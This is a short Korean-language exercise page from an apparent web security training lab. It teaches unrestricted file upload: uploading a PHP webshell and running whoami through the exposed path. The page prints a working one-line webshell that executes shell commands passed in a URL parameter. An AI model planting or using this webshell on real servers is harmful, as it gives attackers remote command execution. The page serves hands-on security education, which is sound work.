← 대시보드 Webshell Upload piro-lab PRAC

🐚 Webshell Upload

기본 파일 업로드 → 명령 실행

OWASP A04 · Unrestricted Upload
실습 목표: PHP 웹쉘을 업로드한 뒤, JSON 응답의 file.path / file.cmd_url로 whoami를 실행하세요.

취약점: 업로드 API가 검증 없이 파일을 저장하고, 응답 JSON에 웹 접근 경로가 그대로 노출됩니다.
업로드 응답 (JSON)
업로드하면 JSON 응답이 여기에 표시됩니다.

예시 웹쉘 (shell.php)

<?php if (isset($_GET['cmd'])) { echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>'; } ?>

📂 업로드된 파일